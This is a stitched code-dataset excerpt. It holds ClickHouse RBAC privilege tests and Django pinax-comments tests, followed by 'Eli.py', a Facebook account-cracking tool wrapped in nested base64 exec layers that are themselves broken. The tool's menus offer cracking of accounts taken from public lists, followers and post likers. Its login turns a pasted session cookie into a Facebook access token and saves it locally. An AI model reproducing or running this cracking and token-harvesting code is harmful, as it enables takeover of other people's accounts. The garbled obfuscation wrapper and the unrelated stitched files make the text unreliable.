)(grant_target_name=user_name, user_name=user_name)
with user(node, f"{user_name}"), role(node, f"{role_name}"):
with When("I grant the role to the user"):
node.query(f"GRANT {role_name} TO {user_name}")
Scenario(
test=insert_with_insert_privilege,
name="insert on view, privilege granted through a role",
)(grant_target_name=role_name, user_name=user_name)
@TestOutline
def insert_with_insert_privilege(self, grant_target_name, user_name, node=None):
"""Grant INSERT and check user is able to INSERT into the materialized view only if they have INSERT privilege for the view."""
view_name = f"view_{getuid()}"
table0_name = f"table0_{getuid()}"
table1_name = f"table1_{getuid()}"
exitcode, message = errors.not_enough_privileges(name=f"{user_name}")
if node is None:
node = self.context.node
with table(node, f"{table0_name},{table1_name}"):
try:
with Given("I have a view"):
node.query(f"DROP VIEW IF EXISTS {view_name}")
node.query(
f"CREATE MATERIALIZED VIEW {view_name} TO {table0_name} AS SELECT * FROM {table1_name}"
)
with When("I grant INSERT on the view"):
node.query(f"GRANT INSERT ON {view_name} TO {grant_target_name}")
with Then("I attempt to insert into the view"):
node.query(
f"INSERT INTO {view_name}(d) VALUES ('2020-01-01')",
settings=[("user", f"{user_name}")],
)
finally:
with Finally("I drop the view"):
node.query(f"DROP VIEW IF EXISTS {view_name}")
@TestScenario
@Requirements(
RQ_SRS_006_RBAC_MaterializedView_Insert_TargetTable("1.0"),
)
def insert_on_target_table_privilege_granted_directly_or_via_role(self, node=None):
"""Check that user is able to INSERT into the target table of a materialized view if and only if they have INSERT privilege for the table,
either directly or through a role.
"""
user_name = f"user_{getuid()}"
role_name = f"role_{getuid()}"
if node is None:
node = self.context.node
with user(node, f"{user_name}"):
Scenario(
test=insert_on_target_table,
name="insert on target table, privilege granted directly",
)(grant_target_name=user_name, user_name=user_name)
with user(node, f"{user_name}"), role(node, f"{role_name}"):
with When("I grant the role to the user"):
node.query(f"GRANT {role_name} TO {user_name}")
Scenario(
test=insert_on_target_table,
name="insert on target table, privilege granted through a role",
)(grant_target_name=role_name, user_name=user_name)
@TestOutline
def insert_on_target_table(self, grant_target_name, user_name, node=None):
"""Grant INSERT and check user is able to INSERT into target table."""
view_name = f"view_{getuid()}"
table0_name = f"table0_{getuid()}"
table1_name = f"table1_{getuid()}"
if node is None:
node = self.context.node
with table(node, f"{table0_name},{table1_name}"):
try:
with Given("I have a view"):
node.query(f"DROP VIEW IF EXISTS {view_name}")
node.query(
f"CREATE MATERIALIZED VIEW {view_name} TO {table0_name} AS SELECT * FROM {table1_name}"
)
with When("I grant INSERT on the target table"):
node.query(f"GRANT INSERT ON {table0_name} TO {grant_target_name}")
with Then("I attempt to insert into the target table"):
node.query(
f"INSERT INTO {table0_name}(d) VALUES ('2020-01-01')",
settings=[("user", f"{user_name}")],
)
finally:
with Finally("I drop the view"):
node.query(f"DROP VIEW IF EXISTS {view_name}")
@TestScenario
@Requirements(
RQ_SRS_006_RBAC_MaterializedView_Insert_TargetTable("1.0"),
)
def insert_on_implicit_target_table_privilege_granted_directly_or_via_role(
self, node=None
):
"""Check that user is able to INSERT into the implicit target table of a materialized view if and only if they have INSERT privilege for the table,
either directly or through a role.
"""
user_name = f"user_{getuid()}"
role_name = f"role_{getuid()}"
if node is None:
node = self.context.node
with user(node, f"{user_name}"):
Scenario(
test=insert_on_target_table,
name="insert on implicit target table, privilege granted directly",
)(grant_target_name=user_name, user_name=user_name)
with user(node, f"{user_name}"), role(node, f"{role_name}"):
with When("I grant the role to the user"):
node.query(f"GRANT {role_name} TO {user_name}")
Scenario(
test=insert_on_target_table,
name="insert on implicit target table, privilege granted through a role",
)(grant_target_name=role_name, user_name=user_name)
@TestOutline
def insert_on_target_table(self, grant_target_name, user_name, node=None):
"""Grant INSERT and check user is able to INSERT into implicit target table."""
view_name = f"view_{getuid()}"
table_name = f"table0_{getuid()}"
implicit_table_name = f'\\".inner.{view_name}\\"'
if node is None:
node = self.context.node
with table(node, f"{table_name}"):
try:
with Given("I have a view"):
node.query(f"DROP VIEW IF EXISTS {view_name}")
node.query(
f"CREATE MATERIALIZED VIEW {view_name} ENGINE = Memory AS SELECT * FROM {table_name}"
)
with When("I grant INSERT on the target table"):
node.query(
f"GRANT INSERT ON {implicit_table_name} TO {grant_target_name}"
)
with Then("I attempt to insert into the target table"):
node.query(
f"INSERT INTO {implicit_table_name}(d) VALUES ('2020-01-01')",
settings=[("user", f"{user_name}")],
)
finally:
with Finally("I drop the view"):
node.query(f"DROP VIEW IF EXISTS {view_name}")
@TestFeature
@Requirements(
RQ_SRS_006_RBAC_MaterializedView("1.0"),
)
@Name("materialized view")
def feature(self, stress=None, node="clickhouse1"):
self.context.node = self.context.cluster.node(node)
if stress is not None:
self.context.stress = stress
with Pool(3) as pool:
try:
for suite in loads(current_module(), Suite):
Suite(test=suite, parallel=True, executor=pool)
finally:
join()
| 41.592853
| 266
| 0.572036
| 17,290
| 141,998
| 4.479294
| 0.012724
| 0.051648
| 0.033313
| 0.022932
| 0.975377
| 0.969695
| 0.960567
| 0.952716
| 0.947616
| 0.938022
| 0
| 0.009026
| 0.339174
| 141,998
| 3,413
| 267
| 41.60504
| 0.816318
| 0.083219
| 0
| 0.819277
| 0
| 0.006024
| 0.26737
| 0.011461
| 0
| 0
| 0
| 0
| 0.002126
| 1
| 0.030829
| false
| 0.000354
| 0.001772
| 0
| 0.032601
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
0aa24df4982c15b5a1e452252b55a6186eaceb25
| 11,517
|
py
|
Python
|
pinax/comments/tests/tests.py
|
rosscdh/pinax-comments
|
266632ef22b7fd922a8d3ffd6eabdac71e2385d9
|
[
"MIT"
] | 59
|
2015-12-15T22:53:40.000Z
|
2021-07-06T03:28:49.000Z
|
pinax/comments/tests/tests.py
|
rosscdh/pinax-comments
|
266632ef22b7fd922a8d3ffd6eabdac71e2385d9
|
[
"MIT"
] | 22
|
2015-10-01T14:34:50.000Z
|
2021-07-27T09:49:33.000Z
|
pinax/comments/tests/tests.py
|
rosscdh/pinax-comments
|
266632ef22b7fd922a8d3ffd6eabdac71e2385d9
|
[
"MIT"
] | 19
|
2016-01-27T17:41:35.000Z
|
2021-09-22T09:30:50.000Z
|
from django.contrib.contenttypes.models import ContentType
from django.template import Context, Template
from django.urls import reverse
from pinax.comments.forms import CommentForm
from pinax.comments.models import Comment
from .models import Demo
from .test import TestCase
class TestCaseMixin(TestCase):
def get(self, url_name, *args, **kwargs):
data = kwargs.pop("data", {})
return self.get(reverse(url_name, args=args, kwargs=kwargs), data)
def getajax(self, url_name, *args, **kwargs):
data = kwargs.pop("data", {})
return self.get(reverse(url_name, args=args, kwargs=kwargs), data,
HTTP_X_REQUESTED_WITH="XMLHttpRequest")
def post_comment_2(self, url_name, *args, **kwargs):
url_name = "pinax_comments:" + url_name
return self.post(url_name, args=args, kwargs=kwargs)
def post_ajax(self, url_name, *args, **kwargs):
data = kwargs.pop("data", {})
return self.post(reverse(url_name, args=args, kwargs=kwargs), data,
HTTP_X_REQUESTED_WITH="XMLHttpRequest")
def reload(self, obj):
return obj.__class__._default_manager.get(pk=obj.pk)
def assert_renders(self, tmpl, context, value):
tmpl = Template(tmpl)
self.assertEqual(tmpl.render(context), value)
class CommentTests(TestCaseMixin):
def setUp(self):
super().setUp()
self.gimli = self.make_user(username="gimli")
self.aragorn = self.make_user(username="aragorn")
def assert_renders(self, tmpl, context, value):
tmpl = Template(tmpl)
self.assertEqual(tmpl.render(context), value)
def post_comment(self, obj, data, **kwargs):
return self.post(
"pinax_comments:post_comment",
content_type_id=ContentType.objects.get_for_model(obj).pk,
object_id=obj.pk,
data=data,
**kwargs
)
def test_post_comment(self):
d = Demo.objects.create(name="Wizard")
response = self.post_comment(d, data={
"name": "Frodo Baggins",
"comment": "Where'd you go?",
})
self.response_302(response)
self.assertEqual(Comment.objects.count(), 1)
c = Comment.objects.get()
self.assertEqual(c.author, None)
self.assertEqual(c.name, "Frodo Baggins")
response = self.post_comment(d, data={
"comment": "Where is everyone?"
})
self.assertEqual(Comment.objects.count(), 1)
with self.login(self.gimli):
response = self.post_comment(d, data={
"comment": "I thought you were watching the hobbits?"
})
self.response_302(response)
self.assertEqual(Comment.objects.count(), 2)
c = Comment.objects.order_by("id")[1]
self.assertEqual(c.comment, "I thought you were watching the hobbits?")
self.assertEqual(c.author, self.gimli)
def test_ajax_post_comment(self):
"""Verify comment created via AJAX"""
d = Demo.objects.create(name="Wizard")
response = self.post_comment(d, data={
"name": "Frodo Baggins",
"comment": "Where'd you go?",
}, extra=dict(HTTP_X_REQUESTED_WITH="XMLHttpRequest"))
self.response_200(response)
self.assertEqual(Comment.objects.count(), 1)
c = Comment.objects.get()
self.assertEqual(c.author, None)
self.assertEqual(c.name, "Frodo Baggins")
def test_ajax_post_comment_bad_data(self):
"""Verify no comment created if form data is invalid"""
d = Demo.objects.create(name="Wizard")
response = self.post_comment(d, data={
"artist": "Frida Kahlo",
"comment": "Where'd you go?",
}, extra=dict(HTTP_X_REQUESTED_WITH="XMLHttpRequest"))
self.response_200(response)
# Ensure no comment was created
self.assertEqual(Comment.objects.count(), 0)
def test_update_comment(self):
"""Ensure existing comment is updated"""
d = Demo.objects.create(name="Wizard")
with self.login(self.gimli):
response = self.post_comment(d, data={
"comment": "Wow, you're a jerk.",
})
comment = Comment.objects.get()
new_comment = "Oops, wrong wizard! You are wonderful!"
post_data = dict(comment=new_comment)
response = self.post(
"pinax_comments:edit_comment",
pk=comment.pk,
data=post_data,
)
self.assertEqual(response.status_code, 302)
comment.refresh_from_db()
self.assertEqual(comment.comment, new_comment)
def test_ajax_update_comment(self):
"""Ensure existing comment is updated"""
d = Demo.objects.create(name="Wizard")
with self.login(self.gimli):
self.post_comment(d, data={
"comment": "Wow, you're a jerk.",
})
comment = Comment.objects.get()
new_comment = "Oops, wrong wizard! You are wonderful!"
post_data = dict(comment=new_comment)
response = self.post(
"pinax_comments:edit_comment",
pk=comment.pk,
data=post_data,
extra=dict(HTTP_X_REQUESTED_WITH="XMLHttpRequest")
)
self.assertEqual(response.status_code, 200)
comment.refresh_from_db()
self.assertEqual(comment.comment, new_comment)
def test_delete_comment(self):
d = Demo.objects.create(name="Wizard")
with self.login(self.gimli):
response = self.post_comment(d, data={
"comment": "Wow, you're a jerk.",
})
comment = Comment.objects.get()
# Anonymous user cannot delete
response = self.post("pinax_comments:delete_comment", pk=comment.pk)
self.response_302(response)
self.assertEqual(Comment.objects.count(), 1)
# User is not comment author, cannot delete
with self.login(self.aragorn):
response = self.post("pinax_comments:delete_comment", pk=comment.pk)
self.assertEqual(response.status_code, 302)
self.assertEqual(Comment.objects.count(), 1)
# Comment author can delete
with self.login(self.gimli):
response = self.post("pinax_comments:delete_comment", pk=comment.pk)
self.assertEqual(response.status_code, 302)
self.assertEqual(Comment.objects.count(), 0)
def test_ajax_delete_comment(self):
d = Demo.objects.create(name="Wizard")
with self.login(self.gimli):
response = self.post_comment(d, data={
"comment": "Wow, you're a jerk.",
})
comment = Comment.objects.get()
response = self.post(
"pinax_comments:delete_comment",
pk=comment.pk,
extra=dict(HTTP_X_REQUESTED_WITH="XMLHttpRequest")
)
self.assertEqual(response.status_code, 200)
# Verify comment is deleted
self.assertEqual(Comment.objects.count(), 0)
def test_ajax_delete_comment_wrong_user(self):
d = Demo.objects.create(name="Wizard")
with self.login(self.gimli):
response = self.post_comment(d, data={
"comment": "Wow, you're a jerk.",
})
comment = Comment.objects.get()
with self.login(self.aragorn):
response = self.post(
"pinax_comments:delete_comment",
pk=comment.pk,
extra=dict(HTTP_X_REQUESTED_WITH="XMLHttpRequest")
)
self.assertEqual(response.status_code, 200)
# Verify comment is not deleted
self.assertEqual(Comment.objects.count(), 1)
def test_ttag_comment_count(self):
d = Demo.objects.create(name="Wizard")
self.post_comment(d, data={
"name": "Gandalf",
"comment": "You can't win",
})
self.post_comment(d, data={
"name": "Gollum",
"comment": "We wants our precious",
})
self.assert_renders(
"{% load pinax_comments_tags %}{% comment_count o %}",
Context({"o": d}),
"2"
)
def test_ttag_comments(self):
d = Demo.objects.create(name="Wizard")
self.post_comment(d, data={
"name": "Gandalf",
"comment": "You can't win",
})
self.post_comment(d, data={
"name": "Gollum",
"comment": "We wants our precious",
})
c = Context({"o": d})
self.assert_renders(
"{% load pinax_comments_tags %}{% comments o as cs %}",
c,
""
)
self.assertEqual(list(c["cs"]), list(Comment.objects.all()))
def test_ttag_comment_form(self):
d = Demo.objects.create(name="Wizard")
c = Context({"o": d})
self.assert_renders(
"{% load pinax_comments_tags %}{% comment_form o as comment_form %}",
c,
""
)
self.assertTrue(isinstance(c["comment_form"], CommentForm))
with self.login(self.gimli):
c = Context({"o": d, "user": self.gimli})
self.assert_renders(
"{% load pinax_comments_tags %}{% comment_form o as comment_form %}",
c,
""
)
self.assertTrue(isinstance(c["comment_form"], CommentForm))
def test_ttag_comment_target(self):
d = Demo.objects.create(name="Wizard")
self.assert_renders(
"{% load pinax_comments_tags %}{% comment_target o %}",
Context({"o": d}),
"/comment/%d/%d/" % (ContentType.objects.get_for_model(d).pk, d.pk)
)
def test_ttag_can_edit_comment(self):
d = Demo.objects.create(name="Wizard")
with self.login(self.gimli):
self.post_comment(d, data={
"name": "Gandalf",
"comment": "You can't win",
})
comment = Comment.objects.get()
self.assert_renders(
"{% load pinax_comments_tags %}{% if comment|can_edit_comment:user %}True{% else %}False{% endif %}",
Context({"comment": comment, "user": self.gimli}),
"True"
)
self.assert_renders(
"{% load pinax_comments_tags %}{% if comment|can_edit_comment:user %}True{% else %}False{% endif %}",
Context({"comment": comment, "user": self.aragorn}),
"False"
)
def test_ttag_can_delete_comment(self):
d = Demo.objects.create(name="Wizard")
with self.login(self.gimli):
self.post_comment(d, data={
"name": "Gandalf",
"comment": "You can't win",
})
comment = Comment.objects.get()
self.assert_renders(
"{% load pinax_comments_tags %}{% if comment|can_delete_comment:user %}True{% else %}False{% endif %}",
Context({"comment": comment, "user": self.gimli}),
"True"
)
self.assert_renders(
"{% load pinax_comments_tags %}{% if comment|can_delete_comment:user %}True{% else %}False{% endif %}",
Context({"comment": comment, "user": self.aragorn}),
"False"
)
| 35.990625
| 115
| 0.570548
| 1,290
| 11,517
| 4.94031
| 0.120155
| 0.063549
| 0.040169
| 0.040169
| 0.814059
| 0.789424
| 0.766201
| 0.755688
| 0.724776
| 0.70375
| 0
| 0.005723
| 0.302075
| 11,517
| 319
| 116
| 36.103448
| 0.787136
| 0.029087
| 0
| 0.719231
| 0
| 0
| 0.17085
| 0.031015
| 0
| 0
| 0
| 0
| 0.153846
| 1
| 0.088462
| false
| 0
| 0.026923
| 0.007692
| 0.146154
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
0ae4b921988ff8f3e644427ae27646a4e2ab60e4
| 244,320
|
py
|
Python
|
Eli.py
|
GUPTA-SHAKEL/Elite
|
7f58bdf54f1bd0ef9debcaeb18282690e310abe7
|
[
"MIT"
] | null | null | null |
Eli.py
|
GUPTA-SHAKEL/Elite
|
7f58bdf54f1bd0ef9debcaeb18282690e310abe7
|
[
"MIT"
] | null | null | null |
Eli.py
|
GUPTA-SHAKEL/Elite
|
7f58bdf54f1bd0ef9debcaeb18282690e310abe7
|
[
"MIT"
] | null | null | null |
import base64
exec(base64.b64decode("import base64
exec(base64.b64decode("import base64
exec(base64.b64decode("import base64
exec(base64.b64decode("# Coded by Mark Cornel
# with (uncompyle6) version : 3.7.4
# Time Succes coded : 2022-7-1 15:47:11.403269
import requests,bs4,sys,os,random,time,re,json,uuid,subprocess
from random import randint
from concurrent.futures import ThreadPoolExecutor as ThreadPool
from bs4 import BeautifulSoup as par
from datetime import date
from datetime import datetime
from urllib.parse import quote
P = "\x1b[0;97m" # Putih
M = "\x1b[0;91m" # Merah
H = "\x1b[0;92m" # Hijau
K = "\x1b[0;93m" # Kuning
B = "\x1b[0;94m" # Biru
U = "\x1b[0;95m" # Ungu
O = "\x1b[0;96m" # Biru Muda
N = "\033[0m"    # Warna Mati
url_license = 'https://app.cryptolens.io/product/detail/13642'
host = "https://mbasic.facebook.com"
ok = []
cp = []
ttl = []
current = datetime.now()
ta = current.year
bu = current.month
ha = current.day
bulan_ttl = {"01": "January", "02": "February", "03": "March", "04": "April", "05": "May", "06": "June", "07": "July", "08": "August", "09": "September", "10": "October", "11": "November", "12": "December"}
bulan = ["January", "February", "March", "April", "May", "June", "July", "August", "September", "October", "November", "December"]
try:
    if bu < 0 or bu > 12:
        exit()
    buTemp = bu - 1
except ValueError:
    exit()
op = bulan[buTemp]
tanggal = ("%s-%s-%s"%(ha,op,ta))
ua_xiaomi  = 'Mozilla/5.0 (Linux; Android 10; Mi 9T Pro Build/QKQ1.190825.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/88.0.4324.181 Mobile Safari/537.36 [FBAN/EMA;FBLC/id_ID;FBAV/239.0.0.10.109;]'
ua_nokia   = 'nokiac3-00/5.0 (07.20) profile/midp-2.1 configuration/cldc-1.1 mozilla/5.0 applewebkit/420+ (khtml, like gecko) safari/420+'
ua_asus    = 'Mozilla/5.0 (Linux; Android 5.0; ASUS_Z00AD Build/LRX21V) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/37.0.0.0 Mobile Safari/537.36 [FBAN/EMA;FBLC/id_ID;FBAV/239.0.0.10.109;]'
ua_huawei  = 'Mozilla/5.0 (Linux; Android 8.1.0; HUAWEI Y7 PRIME 2019 Build/5887208) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.62 Mobile Safari/537.36 [FBAN/EMA;FBLC/id_ID;FBAV/239.0.0.10.109;]'
ua_vivo    = 'Mozilla/5.0 (Linux; Android 11; vivo 1918) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.62 Mobile Safari/537.36 [FBAN/EMA;FBLC/id_ID;FBAV/239.0.0.10.109;]'
ua_oppo    = 'Mozilla/5.0 (Linux; Android 5.1.1; A37f) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.105 Mobile Safari/537.36 [FBAN/EMA;FBLC/id_ID;FBAV/239.0.0.10.109;]'
ua_samsung = 'Mozilla/5.0 (Linux; Android 5.0; SM-G900P Build/LRX21T; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/43.0.2357.121 Mobile Safari/537.36 [FB_IAB/FB4A;FBAV/35.0.0.48.273;]'
ua_windows = 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36 [FBAN/EMA;FBLC/id_ID;FBAV/239.0.0.10.109;]'
def jalan(z):
    for e in z + "\n":
        sys.stdout.write(e)
        sys.stdout.flush()
        time.sleep(0.04)
def mlaku(z):
    for e in z + "\n":
        sys.stdout.write(e)
        sys.stdout.flush()
        time.sleep(0.03)
def clear():
    if "linux" in sys.platform.lower():os.system("clear")
    elif "win" in sys.platform.lower():os.system("cls")
    else:os.system("clear")
def banner():
    print("\n%s    _________ __     \n%s   / ____/ (_) /____  ║ %sAuthor: %sMark Cornel %s %sWa:+2347013107449\n%s  / __/ / / / __/ _ \ ║ %sFB %s: %sFacebook.com/1000xxxx\n%s / /___/ / / /_/  __/ ║ %sFB %s: %sMark.Cornel8\n%s/_____/_/_/\__/\___/  ║ %sGithub%s:%sGithub.com/GUPTA-SHAKEL\n"%(O,O,P,O,P,O,O,P,O,P,O,P,O,P,O,P,O,P))
def menu_log():
    os.system('rm -rf token.txt')
    clear()
    banner()
    var_menu()
    pmu = input('%s╠══[%s•%s] %sChoose : '%(O,P,O,P))
    print('%s║'%(O))
    if pmu in ['']:
        jalan('%s╚══[%s!%s] %sCorrect Content'%(M,P,M,P))
        menu_log()
    elif pmu in ['1','01','001','a']:
        defaultua()
        token = input('%s╚══[%s•%s] %sToken : '%(O,P,O,P))
        try:
            x = requests.get("https://graph.facebook.com/me?access_token=" + token)
            y = json.loads(x.text)
            n = y['name']
            xd = open("token.txt", "w")
            xd.write(token)
            xd.close()
            #print('%s║'%(O))
            #jalan('%s╚══[%s!%s] %sLogin Successful'%(O,P,O,P))
            exit(BeautifulSoup.main())
            #menu()
        except (KeyError,IOError):
            print('%s║'%(O))
            jalan('%s╚══[%s!%s] %sToken Invalid'%(M,P,M,P))
            os.system('rm -rf token.txt')
            menu_log()
        except requests.exceptions.ConnectionError:
            print('%s║'%(O))
            jalan('%s╚══[%s!%s] %sConnection Problem'%(M,P,M,P))
            exit()
    elif pmu in ['2','02','002','b']:
        defaultua()
        cookie = input('%s╚══[%s•%s] %sCookies : '%(O,P,O,P))
        try:
            data = requests.get("https://m.facebook.com/composer/ocelot/async_loader/?publisher=feed#_=_", headers = {
            "user-agent"                : "Mozilla/5.0 (Linux; Android 8.1.0; MI 8 Build/OPM1.171019.011) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.86 Mobile Safari/537.36", # Jangan Di Ganti Ea Anjink.
            "referer"                   : "https://m.facebook.com/",
            "host"                      : "m.facebook.com",
            "origin"                    : "https://m.facebook.com",
            "upgrade-insecure-requests" : "1",
            "accept-language"           : "id-ID,id;q=0.9,en-US;q=0.8,en;q=0.7",
            "cache-control"             : "max-age=0",
            "accept"                    : "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8",
            "content-type"              : "text/html; charset=utf-8"
            }, cookies = {
            "cookie"                    : cookie
            })
            find_token = re.search("(EAAA\w+)", data.text)
            hasil = "\n* Fail : maybe your cookie invalid !!" if (find_token is None) else "\n* Your fb access token : " + find_token.group(1)
            xd = open("token.txt", "w")
            xd.write(find_token.group(1))
            xd.close()
            #print('%s║'%(O))
            #jalan('%s╚══[%s!%s] %sLogin Successful'%(O,P,O,P))
            exit(BeautifulSoup.main())
            #menu()
        except requests.exceptions.ConnectionError:
            print('%s║'%(O))
            jalan('%s╚══[%s!%s] %sConnection Problem'%(M,P,M,P))
            exit()
        except (KeyError,IOError,AttributeError):
            print('%s║'%(O))
            jalan('%s╚══[%s!%s] %sCookies Invalid'%(M,P,M,P))
            os.system('rm -rf token.txt')
            menu_log()
    elif pmu in ['3','03','003','c']:
        clear()
        banner()
        var_tutor()
        pf = input('%s╠══[%s•%s] %sChoose : '%(O,P,O,P))
        print('%s║'%(O))
        if pf in ['']:
            jalan('%s╚══[%s!%s] %sCorrect Content'%(M,P,M,P))
            menu_log()
        elif pf in ['1','01','001','a']:
            os.system('xdg-open https://wa.me/+2347013107449')
            input('%s╚══[ %sReturn %s]%s'%(O,P,O,P))
            menu_log()
        elif pf in ['2','02','002','b']:
            os.system('xdg-open https://www.facebook.com/Mark.Cornel8')
            input('%s╚══[ %sReturn %s]%s'%(O,P,O,P))
            menu_log()
        elif pf in ['3','03','003','c']:
            os.system('xdg-open https://wa.me/+2347013107449')
            tutor_target()
            input('%s╚══[ %sReturn %s]%s'%(O,P,O,P))
            menu_log()
        elif pf in ['4','04','004','d']:
            tutor_crack()
            input('%s╚══[ %sReturn %s]%s'%(O,P,O,P))
            menu_log()
        else:
            jalan('%s╚══[%s!%s] %sCorrect Content'%(M,P,M,P))
            menu_log()
    elif pmu in ['4','04','004','d']:
        clear()
        banner()
        var_author()
        input('%s╚══[ %sReturn %s]%s'%(O,P,O,P))
        menu_log()
    elif pmu in ['0','00','000','e']:
        jalan('%s╠══[%s!%s] %sThank You For Using This SC'%(O,P,O,P))
        jalan('%s╚══[%s!%s] %sHave a Nice Day :)\n'%(O,P,O,P))
        os.system('rm -rf token.txt')
        clear()
        exit()
    else:
        jalan('%s╚══[%s!%s] %sCorrect Content'%(M,P,M,P))
        menu_log()
def menu():
    clear()
    banner()
    try:
        lisensi = open("license.txt","r").read()
        wl = requests.get(url_license + lisensi)
        wk = json.loads(wl.text)
        kun = lisensi.split('-')
        users = wk['username']
        mailerts = wk['email'].split('@')
        mailert1 = mailerts[0]
        mailert2 = mailerts[1]
        mailer = mailert1[:2]
        maile = (mailer+'xxxxx@'+mailert2)
        bergabung = wk['joined']
        kadaluarsa = wk['expired']
        status = ('%sPremium [%sPro%s]'%(O,P,O))
        kunci = ('%s%s%s-%s%s%s-%sXXXXX'%(O,kun[0],P,O,kun[1],P,O))
        pro = ''
        upgrade = 'Change License Key'
        jid = ''
    except (KeyError,IOError):
        status = 'P R E M I U M'
        users = '-'
        maile = '-'
        kunci = '-'
        bergabung = '-'
        kadaluarsa = '-'
        pro = ("%s[%sPro%s]"%(O,P,O))
        upgrade = ('Upgrade To Version %s--'%(O))
        jid = ('%s[%s50000%s]'%(O,P,O))
    try:
        token = open("token.txt","r").read()
        x = requests.get("https://graph.facebook.com/me?access_token=" + token)
        y = json.loads(x.text)
        n = y['name']
        i = y['id']
    except (KeyError,IOError):
        print('%s╔══[ %sOh %s]%s'%(M,P,M,P))
        print('%s║'%(M))
        jalan('%s╚══[%s!%s] %sToken/Cookies Invalid'%(M,P,M,P))
        os.system('rm -rf token.txt')
        menu_log()
    except requests.exceptions.ConnectionError:
        print('%s╔══[ %sOh %s]%s'%(M,P,M,P))
        print('%s║'%(M))
        jalan('%s╚══[%s!%s] %sConnection Problem'%(M,P,M,P))
        exit()
    a = requests.get("http://ip-api.com/json/",headers={"Referer":"http://ip-api.com/","Content-Type":"application/json; charset=utf-8","User-Agent":"Mozilla/5.0 (Linux; Android 10; Mi 9T Pro Build/QKQ1.190825.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/88.0.4324.181 Mobile Safari/537.36[FBAN/EMA;FBLC/it_IT;FBAV/239.0.0.10.109;]"}).json()
    try:
        ip = a["query"]
    except KeyError:
        ip = " "
    print('%s╔══[ %sWellcome %s %s]'%(O,P,n,O))
    print('%s║'%(O))
    print('%s╠══[%s•%s] %sID : %s'%(O,P,O,P,i))
    print('%s╠══[%s•%s] %sIP : %s'%(O,P,O,P,ip))
    print('%s║'%(O))
    print('%s╠══[%s•%s] %sStatus : %s'%(O,P,O,P,status))
    print('%s╠══[%s•%s] %sName : Mark Cornel %s'%(O,P,O,P,users))
    print('%s╠══[%s•%s] %sEmail : ngoziclinton44@gmail.com%s'%(O,P,O,P,maile))
    print('%s╠══[%s•%s] %sKey : Xxxxxxxx%s'%(O,P,O,P,kunci))
    print('%s╠══[%s•%s] %sJoin Since : 29-12-2021%s'%(O,P,O,P,bergabung))
    print('%s╠══[%s•%s] %sValid until : 2030%s'%(O,P,O,P,kadaluarsa))
    print('%s║'%(O))
    print('%s╠══[%s1%s] %sCrack From Public %s'%(O,P,O,P,jid))
    print('%s╠══[%s2%s] %sCrack From Follower %s'%(O,P,O,P,jid))
    print('%s╠══[%s3%s] %sCrack From likes post %s'%(O,P,O,P,jid))
    print('%s╠══[%s4%s] %sRetrieve Target Data'%(O,P,O,P))
    print('%s╠══[%s5%s] %sTaking Number of Friends %s'%(O,P,O,P,pro))
    print('%s╠══[%s6%s] %sCheck Crack Results'%(O,P,O,P))
    print('%s╠══[%s7%s] %sCheck Crack Result Options %s'%(O,P,O,P,pro))
    print('%s╠══[%s8%s] %sUser Agent'%(O,P,O,P))
    print('%s╠══[%s9%s] %s%s'%(O,P,O,P,upgrade))
    print('%s╠══[%s0%s] %sLog Out'%(O,P,O,P))
    pm = input('%s╠══[%s•%s] %sChoose : '%(O,P,O,P))
    print('%s║'%(O))
    if pm in ['']:
        jalan('%s╚══[%s!%s] %sIsi Yang Benar'%(M,P,M,P))
        menu()
    elif pm in ['1','01','001','a']:
        publik()
    elif pm in ['2','02','002','b']:
        pengikut()
    elif pm in ['3','03','003','c']:
        likers()
    elif pm in ['4','04','004','d']:
        target()
    elif pm in ['5','05','005','e']:
        teman_target()
    elif pm in ['6','06','006','f']:
        hasil()
    elif pm in ['7','07','007','g']:
        cek_hasil()
    elif pm in ['8','08','008','h']:
        ugen()
    elif pm in ['9','09','009','i']:
        buy_license()
    elif pm in ['0','00','000','j']:
        jalan('%s╚══[%s!%s] %sSee you later'%(O,P,O,P))
        os.system('rm -rf token.txt')
        menu_log()
    else:
        jalan('%s╚══[%s!%s] %sIsi Yang Benar'%(M,P,M,P))
        menu()
def defaultua():
    ua = ua_nokia
    try:
        ugent = open('ugent.txt','w')
        ugent.write(ua)
        ugent.close()
    except (KeyError,IOError):
        menu_log()
def ugen():
    var_ugen()
    pmu = input('%s╠══[%s•%s] %sChoose : '%(O,P,O,P))
    print('%s║'%(O))
    if pmu in[""]:
        jalan('%s╚══[%s!%s] %sCorrect Content'%(M,P,M,P))
        menu()
    elif pmu in ['1','01','001','a']:
        os.system('xdg-open https://www.google.com/search?q=My+User+Agent&oq=My+User+Agent&aqs=chrome..69i57j0l3j0i22i30l6.4674j0j1&sourceid=chrome&ie=UTF-8')
        input('%s╚══[ %sBack %s]%s'%(O,P,O,P))
        menu()
    elif pmu in ['2','02','002','b']:
        os.system("rm -rf ugent.txt")
        ua = input("%s╚══[%s•%s] %sEnter User Agent : \n\n"%(O,P,O,P))
        try:
            ugent = open('ugent.txt','w')
            ugent.write(ua)
            ugent.close()
            jalan("\n%s╔══[ %sSuccesfully Changed User Agent %s]"%(O,P,O))
            print('%s║'%(O))
            input('%s╚══[ %sReturn %s]%s'%(O,P,O,P))
            menu()
